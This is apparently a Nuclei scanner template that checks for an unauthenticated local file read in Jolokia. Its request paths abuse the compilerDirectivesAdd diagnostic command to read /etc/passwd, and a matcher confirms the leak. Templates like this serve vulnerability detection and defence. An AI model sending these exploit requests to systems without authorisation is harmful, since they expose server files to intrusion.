id: jolokia-unauthenticated-lfi
info:
  name: Jolokia - Unauthenticated Local File Read
  author: dhiyaneshDk
  severity: high
  description: This exploit allow you to File read with compilerDirectivesAdd
  reference:
    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
    - https://github.com/laluka/jolokia-exploitation-toolkit
  tags: jolokia,lfi
requests:
  - method: GET
    path:
      - "{{BaseURL}}/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "compilerDirectivesAdd"
        condition: and
      - type: status
        status:
          - 200
